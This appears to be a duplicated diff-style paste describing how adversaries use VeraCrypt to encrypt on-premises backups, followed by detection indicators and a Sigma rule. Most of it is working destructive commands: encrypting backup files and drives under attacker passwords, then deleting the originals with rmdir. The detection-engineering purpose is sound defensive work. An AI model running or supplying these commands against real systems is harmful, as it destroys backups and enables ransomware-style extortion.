justaguywhocodes · November 21, 2025 14:10
diff --git a/veracrypt b/veracrypt
 Commands commonly observed in the wild for this TTP (for testing/detection purposes only)Below are typical commands adversaries use with VeraCrypt to encrypt on-premises backups. These are provided strictly for blue-team detection rule creation, lab testing, or red-team emulation in authorized environments.1. Download VeraCrypt (portable version preferred by attackers)powershell

 Invoke-WebRequest -Uri "https://launchpad.net/veracrypt/trunk/1.26.7/+download/VeraCrypt_Portable_1.26.7.exe" -OutFile "C:\Temp\VeraCrypt.exe"

 2. Create an encrypted container from an existing backup file (most common method)cmd

 VeraCrypt.exe /volume "E:\Backups\backup.vhdx" /letter X /password SuperSecret123! /hash sha512 /encryption aes /filesystem NTFS /size 100% /force /quit

 or silently:cmd

 VeraCrypt.exe /v "E:\Backups\backup.vhdx" /l X /p SuperSecret123! /e aes /h sha512 /f /s /q

 3. Mount all backup files as encrypted volumes in batchpowershell

 Get-ChildItem "E:\Backups\*.vhdx", "E:\Backups\*.vmdk" | ForEach-Object {
    VeraCrypt.exe /v $_.FullName /l ($_.BaseName.Substring(0,1)) /p "P@ssw0rd2025!" /a /e aes-twofish-serpent /q
 }

 4. Create a new large VeraCrypt container and copy backup data into it (then delete original)cmd

 VeraCrypt.exe /create E:\Backups\encrypted_backups.hc /password Malicious123! /hash whirlpool /encryption AES /filesystem NTFS /size 500GB /force /quit
 VeraCrypt.exe /volume E:\Backups\encrypted_backups.hc /letter Z /password Malicious123! /quit
 xcopy E:\Backups\* Z:\ /E /H /C /I
 VeraCrypt.exe /dismount Z /force /quit
 rmdir /S /Q E:\Backups

 5. Full-disk encryption of a backup drive (less common but seen)cmd

 VeraCrypt.exe /create \\.\PhysicalDrive2 /password BackupDestroyer2025! /encryption AES /hash RIPEMD-160 /filesystem NTFS /noise /fast /quit

 Detection opportunities (what to hunt for)Process creationParent process: cmd.exe / powershell.exe / wscript.exe
 Child process: VeraCrypt.exe or VeraCrypt-x64.exe
 Command line contains: /volume, /v, backup file extensions (.vhdx, .vbk, .vmdk, .bak, etc.)

 Example Sigma rule snippet:yaml

 title: VeraCrypt Used Against Backup Files
 commandline|contains:
  - '.vhdx'
  - '.vbk'
  - '.vmdk'
  - 'Backups'
 image: '*\VeraCrypt*.exe'

 File extensions createdLarge .hc files suddenly appearing on backup shares
 Original backup files disappearing after .hc creation

 These commands are provided solely for authorized testing, detection engineering, and defensive research purposes. Do not execute them on production systems containing real backups.
	Commands commonly observed in the wild for this TTP (for testing/detection purposes only)Below are typical commands adversaries use with VeraCrypt to encrypt on-premises backups. These are provided strictly for blue-team detection rule creation, lab testing, or red-team emulation in authorized environments.1. Download VeraCrypt (portable version preferred by attackers)powershell

	Invoke-WebRequest -Uri "https://launchpad.net/veracrypt/trunk/1.26.7/+download/VeraCrypt_Portable_1.26.7.exe" -OutFile "C:\Temp\VeraCrypt.exe"

	2. Create an encrypted container from an existing backup file (most common method)cmd

	VeraCrypt.exe /volume "E:\Backups\backup.vhdx" /letter X /password SuperSecret123! /hash sha512 /encryption aes /filesystem NTFS /size 100% /force /quit

	or silently:cmd

	VeraCrypt.exe /v "E:\Backups\backup.vhdx" /l X /p SuperSecret123! /e aes /h sha512 /f /s /q

	3. Mount all backup files as encrypted volumes in batchpowershell

	Get-ChildItem "E:\Backups\.vhdx", "E:\Backups\.vmdk" \| ForEach-Object {
	VeraCrypt.exe /v $_.FullName /l ($_.BaseName.Substring(0,1)) /p "P@ssw0rd2025!" /a /e aes-twofish-serpent /q
	}

	4. Create a new large VeraCrypt container and copy backup data into it (then delete original)cmd

	VeraCrypt.exe /create E:\Backups\encrypted_backups.hc /password Malicious123! /hash whirlpool /encryption AES /filesystem NTFS /size 500GB /force /quit
	VeraCrypt.exe /volume E:\Backups\encrypted_backups.hc /letter Z /password Malicious123! /quit
	xcopy E:\Backups\* Z:\ /E /H /C /I
	VeraCrypt.exe /dismount Z /force /quit
	rmdir /S /Q E:\Backups

	5. Full-disk encryption of a backup drive (less common but seen)cmd

	VeraCrypt.exe /create \\.\PhysicalDrive2 /password BackupDestroyer2025! /encryption AES /hash RIPEMD-160 /filesystem NTFS /noise /fast /quit

	Detection opportunities (what to hunt for)Process creationParent process: cmd.exe / powershell.exe / wscript.exe
	Child process: VeraCrypt.exe or VeraCrypt-x64.exe
	Command line contains: /volume, /v, backup file extensions (.vhdx, .vbk, .vmdk, .bak, etc.)

	Example Sigma rule snippet:yaml

	title: VeraCrypt Used Against Backup Files
	commandline\|contains:
	- '.vhdx'
	- '.vbk'
	- '.vmdk'
	- 'Backups'
	image: '\VeraCrypt.exe'

	File extensions createdLarge .hc files suddenly appearing on backup shares
	Original backup files disappearing after .hc creation

	These commands are provided solely for authorized testing, detection engineering, and defensive research purposes. Do not execute them on production systems containing real backups.
No results found